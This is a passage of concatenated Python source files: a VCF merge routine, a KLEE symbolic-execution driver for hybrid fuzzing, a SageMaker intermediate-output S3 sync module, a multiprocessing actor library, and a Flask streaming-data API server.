return( record_dict )
def merge_tmp_vcfs():
"""
Function to merge all the tmp contig vcf files
"""
start = time.time()
header = False
# Loop through all chromomsomes
for contig in contig_list:
if not header:
os.system('cat SMuRF_tmp/{}_SMuRF_merged.vcf > {}_merged.vcf'.format(contig, vcf_name))
header = True
else:
os.system('grep -v \'^#\' SMuRF_tmp/{}_SMuRF_merged.vcf >> {}_merged.vcf'.format(contig, vcf_name))
os.system("grep -P '^#|\s+PASS\s+' "+vcf_name+"_merged.vcf > "+vcf_name+"_merged_filtered.vcf")
time.sleep(5)
#os.system("rm -rf SMuRF_tmp")
if __name__ == "__main__":
#get_command_line()
main()
merge_tmp_vcfs()
|
klee_sym_explorer.py | import ConfigParser
import multiprocessing
import subprocess
import os
import sys
import utils
import signal
from utils import bcolors
def se_info(s):
print bcolors.HEADER+"[KleeSym-Info]"+bcolors.ENDC," {0}".format(s)
class SymExplorer:
def __init__(self, config, target):
self.jobs = {}
self.started_jobs = set()
self.config = config
self.target = target
self.get_config()
utils.mkdir_force(self.seed_dir)
self.pid_ctr = 0
se_info("Symbolic Explorer using searcher[{0}]".format(''.join(self.get_search_heuristics())))
def get_config(self):
config = ConfigParser.ConfigParser()
config.read(self.config)
self.bin = config.get("klee sym_explorer", "bin")
self.converter = config.get("klee sym_explorer","converter")
self.seed_dir = config.get("klee sym_explorer", "klee_seed_dir").replace("@target", self.target)
self.search_heuristics = config.get("klee sym_explorer", "search_heuristic").split(":")
self.target_bc = config.get("klee sym_explorer", "target_bc").replace("@target", self.target).split()[0]
self.options = config.get("klee sym_explorer", "target_bc").replace("@target", self.target).split()[1:]
self.klee_err_dir = config.get("klee sym_explorer", "error_dir").replace("@target", self.target)
# print "XXX", self.options
try:
self.max_output = config.get("klee sym_explorer", "max_interesting_output")
except Exception:
self.max_output = None
try:
self.max_mem = config.get("klee conc_explorer", "max_memory")
except Exception:
self.max_mem = str(1024*1024*20) # in kbytes
try:
self.max_time_per_seed = config.get("klee conc_explorer", "max_time_per_seed")
except Exception:
# by default no time limit per seed.
self.max_time_per_seed = 0
self.bitmodel = config.get("moriarty", "bitmodel")
self.input_type = 'symfile' if '@@' in self.options else 'stdin'
self.sync_dir_base = config.get("moriarty", "sync_dir").replace("@target", self.target)
if "AFLUnCovSearcher" in self.get_search_heuristics():
self.fuzzer_cov_file = config.get("auxiliary info", "cov_edge_file").replace("@target", self.target)
#handling cxx options
try:
self.klee_ctor_stub = True if config.get("klee sym_explorer", "klee_ctor_stub") == '1' else False
except Exception:
self.klee_ctor_stub = True
try:
self.klee_uclibcxx = True if config.get("klee sym_explorer", "klee_uclibcxx") == '1' else False
except Exception:
self.klee_uclibcxx = False
def get_search_heuristics(self):
"""return a list of search heuristics"""
return self.search_heuristics
def __repr__(self):
return "SE Engine: KLEE Symbolic Explorer"
def alive(self):
alive = False
multiprocessing.active_children()
for pid in [self.jobs[x]['real_pid'] for x in self.jobs]:
try:
os.kill(pid, 0)
print "sym_explorer pid: {0} is alive".format(pid)
alive = True
except Exception:
print "sym_explorer pid: {0} not alive".format(pid)
# cmd = 'ps -e | grep klee | wc -l'
# if 0 == subprocess.Popen(cmd, shell=True).communicate()[0]:
# alive = False
return alive
def run(self, input_id_map_list, cov_file_list):
"""
For each input,
-convert ktest
-create sync dir
-build cmd
-create new process job
"""
se_info("{0} activated. input list : {1}".format(self, input_id_map_list))
for input_id_map in input_id_map_list:
pid = self.get_new_pid()
input_idx = 0
#--generate klee seed ktest
# print input_id_map
afl_input = input_id_map['input']
klee_seed = self.seed_dir+"/klee_instance_sym_"+str(pid).zfill(6)+".ktest"
# print "before calling converter"
# print afl_input
self.call_converter("a2k", afl_input, klee_seed, self.bitmodel, self.input_type)
if not os.path.exists(klee_seed):
print "no seed" + klee_seed
continue
#--create sync_dir for new klee instance
key = "klee_instance_sym_" + str(pid).zfill(6)
new_sync_dir = self.sync_dir_base+"/"+key+"/queue"
utils.mkdir_force(new_sync_dir)
#--build klee instance cmd
edge_ids = [x for x in input_id_map['interesting_edges']]
stdin_len = os.path.getsize(afl_input)
klee_cmd = self.build_cmd(klee_seed, edge_ids, new_sync_dir, stdin_len, afl_input, cov_file_list[input_idx])
print ' '.join(klee_cmd)
#--construct process meta data, add to jobs list
kw = {'mock_eof':True,'mem_cap': self.max_mem}
p = multiprocessing.Process(target=utils.exec_async, args=[klee_cmd], kwargs=kw)
p.daemon = True
task_st = {}
task_st['instance'] = p
task_st['sync_dir'] = new_sync_dir
task_st['seed'] = klee_seed
task_st['cmd'] = klee_cmd
if "AFLUnCovSearcher" in self.get_search_heuristics():
task_st['afl_cov'] = self.fuzzer_cov_file
self.jobs[pid] = task_st
input_idx = input_idx + 1
for pid, task in self.jobs.iteritems():
try:
if pid not in self.started_jobs:
task['instance'].start()
task['real_pid'] = task['instance'].pid
# print "starting klee process: ", task['real_pid']
self.started_jobs.add(pid)
else:
se_info("WTF the process {0} is already started".format(pid))
except Exception:
pass
return (key, [x['input'] for x in input_id_map_list])
def stop(self):
"""
Terminate all jobs,
you could have more fine-grained control by extending this function
"""
se_info("{0} deactivated".format(self))
for pid, task in self.jobs.iteritems():
se_info("Terminting klee instance: {0} {1} real pid:{2}".format(pid, task['instance'], task['real_pid']))
utils.terminate_proc_tree(task['real_pid'])
#reset jobs queue
self.jobs = {}
# self.started_jobs= set()
def build_cmd(self, ktest_seed, edge_ids, sync_dir, stdin_len, afl_input, out_cov_file):
"""
each afl_testcase will have a list of branch ids,
we use these info to construct the command for
starting a new klee instance
by default:
use klee's own searching algo
if specified afl_uncov in config, use AFLUnCovSearcher
"""
cmd = []
afl_uncov = "--afl-covered-branchid-file="
klee_out_uncov = "--klee-covered-branchid-outfile="
# max_output = "-max-interesting-seinfo="
sync_dir_flag = "--sync-dir="
stdin_sym_flag = "--sym-stdin"
file_sym_flag = "--sym-files"
sanitizer_searcher_flag = "--edge-sanitizer-heuristic"
if self.klee_uclibcxx == True:
klee_libc = "--libc=uclibcxx"
else:
klee_libc = "--libc=uclibc"
if self.klee_ctor_stub == True:
klee_ctor_stub="--disable-inject-ctor-and-dtor=false"
else:
klee_ctor_stub="--disable-inject-ctor-and-dtor=true"
common_prefix = [self.bin,
klee_libc,
klee_ctor_stub,
"--posix-runtime",
"--only-replay-seeds",
"--symbolic-explorer=true",
"--named-seed-matching=true",
"--allow-external-sym-calls",
"--use-non-intrinsics-memops=false",
"--check-overshift=false",
"--only-output-states-covering-new=true"
]
common_prefix.append("--max-memory=0")
if "AFLUnCovSearcher" in self.get_search_heuristics():
common_prefix.append(afl_uncov + self.fuzzer_cov_file)
# common_prefix.append(max_output + self.max_output)
common_prefix.append(klee_out_uncov + out_cov_file)
if "SANGuidedSearcher" in self.get_search_heuristics():
common_prefix.append(sanitizer_searcher_flag)
cmd.extend(common_prefix);
#symbolic explorer by default need target edge ids
for eid in edge_ids:
cmd.append("--branchid-list=" + eid)
cmd.append("--seed-out=" + ktest_seed)
cmd.append(sync_dir_flag + sync_dir)
cmd.append(self.target_bc)
cmd.extend(self.options)
if self.input_type == "stdin":
cmd.append(stdin_sym_flag)
cmd.append(str(stdin_len))
else:
cmd.append("A")
cmd.append(file_sym_flag)
cmd.append("1")
cmd.append(str(stdin_len))
return cmd
def get_new_pid(self):
self.pid_ctr += 1
return self.pid_ctr
def call_converter(self, mode, afl_input, ktest, bitmodel, inputtype):
"""
SEs directly invoke the converter to
convert between the afl/klee file formats
as the SE input format is specific to target SE engine
"""
args = [];
args.append(self.converter)
args.append("--mode="+ mode)
args.append("--afl-name="+afl_input)
args.append("--ktest-name="+ktest)
args.append("--bitmodel="+bitmodel);
args.append("--inputmode="+inputtype);
subprocess.Popen(args).wait()
def terminate_callback(self):
"""called when SIGINT and SIGTERM"""
se_info("packing klee error cases into [{0}]".format(self.klee_err_dir))
utils.pack_klee_errors(self.target, self.klee_err_dir)
def periodic_callback(self):
"""called every 1 hour"""
pass
|
intermediate_output.py | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""This module contains functionality related to the storage of intermediate
training information in "opt/ml/output/intermediate".
"""
from __future__ import absolute_import
import concurrent.futures as futures
import multiprocessing
import os
import shutil
import time
import boto3
import boto3.s3.transfer as s3transfer
import inotify_simple
from six.moves.urllib.parse import urlparse
from sagemaker_training import environment, logging_config
logger = logging_config.get_logger()
intermediate_path = environment.output_intermediate_dir # type: str
failure_file_path = os.path.join(environment.output_dir, "failure") # type: str
success_file_path = os.path.join(environment.output_dir, "success") # type: str
tmp_dir_path = os.path.join(intermediate_path, ".tmp.sagemaker_s3_sync") # type: str
def _timestamp():
"""Return a timestamp with microsecond precision."""
moment = time.time()
moment_us = repr(moment).split(".")[1]
return time.strftime("%Y-%m-%d-%H-%M-%S-{}".format(moment_us), time.gmtime(moment))
def _upload_to_s3(s3_uploader, relative_path, file_path, filename):
"""Upload a file to S3."""
try:
key = os.path.join(s3_uploader["key_prefix"], relative_path, filename)
s3_uploader["transfer"].upload_file(file_path, s3_uploader["bucket"], key)
except FileNotFoundError: # noqa ignore=F821
# Broken link or deleted
pass
except Exception: # pylint: disable=broad-except
logger.exception("Failed to upload file to s3.")
finally:
# delete the original file
if os.path.exists(file_path):
os.remove(file_path)
def _copy_file(executor, s3_uploader, relative_path, filename):
"""Copy a file to a temporary directory."""
try:
src = os.path.join(intermediate_path, relative_path, filename)
dst = os.path.join(tmp_dir_path, relative_path, "{}.{}".format(_timestamp(), filename))
shutil.copy2(src, dst)
executor.submit(_upload_to_s3, s3_uploader, relative_path, dst, filename)
except FileNotFoundError: # noqa ignore=F821
# Broken link or deleted
pass
except Exception: # pylint: disable=broad-except
logger.exception("Failed to copy file to the temporary directory.")
def _watch(inotify, watchers, watch_flags, s3_uploader):
"""As soon as a user is done with a file under `/opt/ml/output/intermediate`
we will be notified by inotify. We will copy this file under
`/opt/ml/output/intermediate/.tmp.sagemaker_s3_sync` folder preserving
the same folder structure to prevent it from being further modified.
As we copy the file we will add timestamp with microseconds precision
to avoid modification during s3 upload.
After that we copy the file to s3 in a separate Thread.
We keep the queue of the files we need to move as FIFO.
"""
# initialize a thread pool with 1 worker
# to be used for uploading files to s3 in a separate thread
executor = futures.ThreadPoolExecutor(max_workers=1)
last_pass_done = False
stop_file_exists = False
# after we see stop file do one additional pass to make sure we didn't miss anything
while not last_pass_done: # pylint: disable=too-many-nested-blocks
# wait for any events in the directory for 1 sec and then re-check exit conditions
for event in inotify.read(timeout=1000):
for flag in inotify_simple.flags.from_mask(event.mask):
# if new directory was created traverse the directory tree to recursively add all
# created folders to the watchers list.
# Upload files to s3 if there any files.
# There is a potential race condition if upload the file and the see a notification
# for it which should cause any problems because when we copy files to temp dir
# we add a unique timestamp up to microseconds.
if flag is inotify_simple.flags.ISDIR and inotify_simple.flags.CREATE & event.mask:
path = os.path.join(intermediate_path, watchers[event.wd], event.name)
for folder, _, files in os.walk(path):
wd = inotify.add_watch(folder, watch_flags)
relative_path = os.path.relpath(folder, intermediate_path)
watchers[wd] = relative_path
tmp_sub_folder = os.path.join(tmp_dir_path, relative_path)
if not os.path.exists(tmp_sub_folder):
os.makedirs(tmp_sub_folder)
for file in files:
_copy_file(executor, s3_uploader, relative_path, file)
elif flag is inotify_simple.flags.CLOSE_WRITE:
_copy_file(executor, s3_uploader, watchers[event.wd], event.name)
last_pass_done = stop_file_exists
stop_file_exists = os.path.exists(success_file_path) or os.path.exists(failure_file_path)
# wait for all the s3 upload tasks to finish and shutdown the executor
executor.shutdown(wait=True)
def start_sync(
s3_output_location, region, endpoint_url=None
): # pylint: disable=inconsistent-return-statements
"""Start intermediate folder sync, which copies files from 'opt/ml/output/intermediate'
directory to the provided s3 output location as files created or modified.
If files are deleted, it doesn't delete them from s3.
It starts intermediate folder behavior as a daemonic process only if the directory
doesn't exists yet. If the directory does exist, it indicates that the platform is
taking care of syncing files to S3 and the container should not interfere.
Args:
s3_output_location (str): Name of the script or module.
region (str): The location of the module.
endpoint_url (str): An alternative endpoint URL to connect to.
Returns:
(multiprocessing.Process): The intermediate output sync daemonic process.
"""
if not s3_output_location or os.path.exists(intermediate_path):
logger.debug("Could not initialize intermediate folder sync to s3.")
return None
# create intermediate and intermediate_tmp directories
os.makedirs(intermediate_path)
os.makedirs(tmp_dir_path)
# configure unique s3 output location similar to how SageMaker platform does it
# or link it to the local output directory
url = urlparse(s3_output_location)
if url.scheme == "file":
logger.debug("Local directory is used for output. No need to sync any intermediate output.")
return None
elif url.scheme != "s3":
raise ValueError("Expecting 's3' scheme, got: %s in %s" % (url.scheme, url))
# create s3 transfer client
client = boto3.client("s3", region, endpoint_url=endpoint_url)
s3_transfer = s3transfer.S3Transfer(client)
s3_uploader = {
"transfer": s3_transfer,
"bucket": url.netloc,
"key_prefix": os.path.join(
url.path.lstrip("/"), os.environ.get("TRAINING_JOB_NAME", ""), "output", "intermediate"
),
}
# Add intermediate folder to the watch list
inotify = inotify_simple.INotify()
watch_flags = inotify_simple.flags.CLOSE_WRITE | inotify_simple.flags.CREATE
watchers = {}
wd = inotify.add_watch(intermediate_path, watch_flags)
watchers[wd] = ""
# start subprocess to sync any files from intermediate folder to s3
p = multiprocessing.Process(target=_watch, args=[inotify, watchers, watch_flags, s3_uploader])
# Make the process daemonic as a safety switch to prevent training job from hanging forever
# in case if something goes wrong and main container process exits in an unexpected way
p.daemon = True
p.start()
return p
|
ipc.py | import sys
import threading
from multiprocessing import Queue, Pipe, Process
if sys.platform == 'win32':
from multiprocessing.reduction import reduce_pipe_connection as reduce_connection
from multiprocessing.reduction import rebuild_pipe_connection as rebuild_connection
else:
from multiprocessing.reduction import reduce_connection, rebuild_connection
class Actor(object):
def __init__(self):
self.inbox = Queue()
self.shared_data = {}
def share(self, name, value):
self.shared_data[name] = value
def get(self, name):
return self.shared_data.get(name, None)
def _ask(self, msg, args=(), kwargs={}):
i, o = Pipe()
reduced = reduce_connection(i)
self.inbox.put([msg, args, kwargs, reduced[1]])
ret = o.recv()
i.close()
o.close()
return ret
def _do(self, handler, chan, args, kwargs):
try:
ret = handler(*args, **kwargs)
if chan:
chan = rebuild_connection(*chan)
chan.send(ret)
chan.close()
except Exception, e:
if chan:
chan = rebuild_connection(*chan)
chan.send(e)
chan.close()
def _handle(self, msg_handlers):
while True:
(msg, args, kwargs, chan) = self.inbox.get()
if msg == "quit":
break
try:
handler = msg_handlers[msg]
t = threading.Thread(target=self._do, args=(handler, chan, args, kwargs))
t.daemon = True
t.start()
except:
pass
def _start(self, holder):
msg_handlers = dict(
[(m, getattr(holder, m)) for m in dir(holder) if m.startswith("IPC_")]
)
t = threading.Thread(target=self._handle, args=(msg_handlers,))
t.daemon = True
t.start()
def _quit(self):
self.inbox.put(["quit", (), {}, None])
def __getattr__(self, name):
def _(*args, **kwargs):
return self._ask(name, args, kwargs)
if name.startswith("IPC_"):
return _
else:
raise AttributeError
class ActorObject(object):
def __init__(self):
self._ref = Actor()
def start_actor(self):
self._ref._start(self)
def quit_actor(self):
self._ref._quit()
def ref(self):
return self._ref
class ActorProcess(ActorObject):
def __init__(self):
super(ActorProcess, self).__init__()
self.process = None
def _run(self):
# in child process, start IPC_ref, so parent can invoke IPC_xxx interfaces.
try:
self.start_actor()
self.run()
except KeyboardInterrupt:
print "interrupt received ..."
def run(self):
raise NotImplementedError
def start(self):
self.process = Process(target=self._run)
self.process.daemon = True
self.process.start()
def join(self):
if self.process:
self.process.join()
def terminate(self):
self.quit_actor()
if self.process:
self.process.terminate()
def is_alive(self):
if self.process:
return self.process.is_alive()
else:
return False
if __name__ == "__main__":
import time
import os
class P1(ActorProcess):
def run(self):
while True:
time.sleep(1)
def IPC_hello(self):
return "Hello, I am P1 running at " + str(os.getpid())
class P2(ActorProcess):
def run(self):
while True:
time.sleep(1)
def IPC_hello(self):
return "Hello, I am P2 running at " + str(os.getpid())
class O1(ActorObject):
def IPC_hello(self):
return "Hello, I am O3 running at " + str(os.getpid())
p1 = P1()
p2 = P2()
p1.start()
p2.start()
print "main process %d" % os.getpid()
print p1.ref().IPC_hello()
print p2.ref().IPC_hello()
p1.terminate()
p1.join()
p2.terminate()
p2.join()
o1 = O1()
o1.start_actor()
print o1.ref().IPC_hello()
|
server.py | from flask import Flask, jsonify, request, Response, abort, Blueprint
from flask_socketio import SocketIO
from flask_cors import CORS
import random
import logging
import pkgutil
import threading
import click
import time
from colorama import Fore, Back, Style
flask_log = logging.getLogger("werkzeug")
flask_log.setLevel(logging.ERROR)
def secho(text, file=None, nl=None, err=None, color=None, **styles):
pass
def echo(text, file=None, nl=None, err=None, color=None, **styles):
pass
click.echo = echo
click.secho = secho
from ..stream import Stream
from ..source import Source
app = Flask(__name__)
CORS(app)
sio = SocketIO(app)
api_version = '/v0'
api = Blueprint('api', __name__)
@api.get("/")
def index():
return jsonify(msg=f"says hello and {random.random()}")
@api.get("/ping")
def ping():
return jsonify(pong=random.randint(1, 100))
@api.get("/start")
def start():
"""route to start the stream provided a stream_name in the url params
returns the stream_status so the client can retieve latest state
"""
# first, check the request has parameter arguments
if request.args:
# NB for request arg this is an ImmutableMultiDict from werkzeug, so can access using ['key'] format
# but it generates it's own error messages if a key is not found, this is useful in general, but complicates
# things in this case, so we convert to regular dictionary, so this keeps code handling args
# keys similar to handling json keys
data = dict(request.args)
else:
return (
jsonify(
msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
),
400,
)
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
stream.start()
r = stream.stream_status
return jsonify(r)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.get("/stop")
def stop():
"""route to stop the stream provided a stream_name in the url params
returns the stream_status so the client can retieve latest state
"""
# first, check the request has parameter arguments
if request.args:
# NB for request arg this is an ImmutableMultiDict from werkzeug, so can access using ['key'] format
# but it generates it's own error messages if a key is not found, this is useful in general, but complicates
# things in this case, so we convert to regular dictionary, so this keeps code handling args
# keys similar to handling json keys
data = dict(request.args)
else:
return (
jsonify(
msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
),
400,
)
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
stream.stop()
r = stream.stream_status
return jsonify(r)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.get("/stream_status")
def stream_status():
"""a general purpose route to enable quick acquisition of a stream state
uses the stream_status @property (not a method to call)
returns relevant properties of a Stream instance so the client can retieve latest state
"""
# first, check the request has parameter arguments
if request.args:
# NB for request arg this is an ImmutableMultiDict from werkzeug, so can access using ['key'] format
# this keeps code handling args similar to handling json
data = dict(request.args)
else:
return (
jsonify(
msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
),
400,
)
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
r = stream.stream_status
return jsonify(r)
# handle an error which as of writing is of unknown type...
except Exception as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.get("/source")
def get_source():
"""a GET route to enable acquisition of a source instance state
uses the source_status @property (not a method to call)
returns the state of one or all Source instance(s) in the 'sources' list
so the client can retrieve latest state
"""
# first, check the request has parameter arguments
if request.args:
# NB for request arg this is an ImmutableMultiDict from werkzeug, so can access using ['key'] format
# this keeps code handling args similar to handling json
data = dict(request.args)
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for source in sources:
if source.name == stream_name:
try:
r = source.get_source_state
return jsonify(r)
# handle an error which as of writing is of unknown type...
except Exception as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
else:
# NOTE this will be dropped to return all source instances in sources list eveutally
return (
jsonify(
msg=f"RequestError: request must contain url arguments (probably missing 'stream_name')"
),
400,
)
@api.patch("/freq")
def freq():
"""PATCH that is sent the new required value for the freq of stream new_freq
and use the stream.set_freq(new_freq) setter
in milliseconds as an integer ie 1,200 ms
"""
# first, check the request has a json data payload
if request.json:
data = request.json
else:
return (
jsonify(msg=f"RequestError: request must contain a json payload"),
400,
)
# then, check all keys are present and have a value
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
new_freq = data["new_freq"]
if not new_freq:
raise ValueError("'new_freq' must not be zero")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
# NB Stream class instances handle type checking for their own properties and methods
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
stream.set_freq(new_freq)
r = stream.stream_status
return jsonify(r)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
except TypeError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
else:
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.patch("/start_burst")
def start_burst():
"""trigger a burst by setting the stream.burst_mode to True via
calling the stream.start_burst() setter method
"""
# first, check the request has a json data payload
if request.json:
data = request.json
else:
return (
jsonify(msg=f"RequestError: request must contain a json payload"),
400,
)
# then, check all keys are present and have a value
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
# NB Stream class instances handle type checking for their own properties and methods
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
stream.start_burst()
r = stream.stream_status
return jsonify(r)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
except TypeError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
else:
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.patch("/burst_freq")
def burst_freq():
"""set the burst frequency by calling stream.set_burst_freq method"""
# first, check the request has a json data payload
if request.json:
data = request.json
else:
return (
jsonify(msg=f"RequestError: request must contain a json payload"),
400,
)
# then, check all keys are present and have a value
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
burst_freq = data["burst_freq"]
if not burst_freq:
raise ValueError("'burst_freq' must not be zero")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
# NB Stream class instances handle type checking for their own properties and methods
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
stream.set_burst_freq(burst_freq)
r = stream.stream_status
return jsonify(r)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
except TypeError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
else:
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.patch("/burst_vol")
def burst_vol():
"""set the burst volume by calling stream.set_burst_vol method"""
# first, check the request has a json data payload
if request.json:
data = request.json
else:
return (
jsonify(msg=f"RequestError: request must contain a json payload"),
400,
)
# then, check all keys are present and have a value
try:
stream_name = data["stream_name"]
if not stream_name:
raise ValueError("'stream_name' must not be empty")
burst_vol = data["burst_vol"]
if not burst_vol:
raise ValueError("'burst_vol' must not be zero")
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
# NB Stream class instances handle type checking for their own properties and methods
if not isinstance(stream_name, str):
return jsonify(
msg=f"TypeError: stream name (stream_name) must be an integer; supplied value was of type {type(stream_name)}"
)
for stream in streams:
if stream.name == stream_name:
try:
stream.set_burst_vol(burst_vol)
r = stream.stream_status
return jsonify(r)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
except TypeError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
else:
return (
jsonify(
msg=f"ValueError: seems like stream '{stream_name}' has not been created...?"
),
404,
)
@api.patch("/source")
def patch_source():
# first, check the request has a json data payload
if request.json:
data = request.json
else:
return (
jsonify(msg=f"RequestError: request must contain a json payload"),
400,
)
# then, check all required keys are present and have a value
try:
source_name = data["stream_name"]
if not source_name:
raise ValueError("'stream_name' must not be empty")
config_area = data["config_area"]
if not config_area:
raise ValueError(f"'config_area' cannot be blank for a patch")
setting = data["setting"]
if not setting:
raise ValueError("'setting' must not be empty")
new_setting_val = data["new_setting_val"]
except KeyError as e:
return (
jsonify(msg=f"missing key: {str(e)}"),
400,
)
except ValueError as e:
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
except Exception as e:
return (
jsonify(msg=f"unkown error: {str(e)}"),
400,
)
# OPTIONAL KEYS
try:
field_name = data["field_name"]
if not field_name:
raise ValueError("'field_name' must not be empty")
except KeyError as e:
field_name = None
except ValueError as e:
# but if it is there it needs a value!
return (
jsonify(msg=f"value error: {str(e)}"),
400,
)
# check that the value of stream_name is of type 'str'
# NB Stream class instances handle type checking for their own properties and methods
if not isinstance(source_name, str):
return jsonify(
msg=f"TypeError: source name {source_name} must be an string; supplied value was of type {type(source_name)}"
)
for source in sources:
if source.name == source_name:
try:
# print("made it to set source call in server")
source.set_source_element(
config_area=config_area,
field_name=field_name,
setting=setting,
new_setting_val=new_setting_val,
)
except ValueError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
except TypeError as e:
return (
jsonify(msg=f"{str(e)}"),
400,
)
except Exception as e:
return (
jsonify(msg=f"unknown error {str(e)}"),
400,
)
else:
r = source.get_source_state
return jsonify(r)
else:
return (
jsonify(
msg=f"ValueError: seems like stream '{source_name}' has not been created...?"
),
404,
)
@app.route("/ui", defaults={"path": ""})
@app.route("/<path:path>")
def catch_all(path):
if path.endswith(".js"):
r = pkgutil.get_data("headwaters", f"{path}")
logging.info(f"request on ui/ to {path}")
return Response(r, mimetype="text/javascript")
elif path.endswith(".css"):
r = pkgutil.get_data("headwaters", f"{path}")
logging.info(f"request on ui/ to {path}")
return Response(r, mimetype="text/css")
elif path.endswith(".ico"):
r = pkgutil.get_data("headwaters", f"{path}")
logging.info(f"request on ui/ to {path}")
return Response(r, mimetype="text/application")
elif path.endswith(".svg"):
r = pkgutil.get_data("headwaters", f"{path}")
logging.info(f"request on ui/ to {path}")
return Response(r, mimetype="image/svg+xml")
else:
r = pkgutil.get_data("headwaters.ui", "index.html")
logging.info(f"request on ui/ to {path}")
return Response(r, mimetype="text/html")
@sio.event("connect")
def connect_hndlr():
logging.info(f"sio connection rcvd {sio.sid}")
streams = []
sources = []
app.register_blueprint(api, url_prefix=f"/api/{api_version}")
def run(selected_sources):
""" """
for selected_source in selected_sources:
try:
source = Source(selected_source)
except FileNotFoundError:
print(
Fore.YELLOW
+ f" source name '{selected_source}' not resolved in schema lookup"
+ Style.RESET_ALL
)
print()
continue
sources.append(source)
streams.append(Stream(source, sio))
stream_threads = []
for stream in streams:
stream_threads.append(threading.Thread(target=stream.flow))
for stream_thread in stream_threads:
stream_thread.start()
port = 5555 # set up a config file
print(
Fore.GREEN
+ Style.BRIGHT
+ f"STREAMS: http://127.0.0.1:{port}/api/v0"
+ Style.RESET_ALL
)
print(
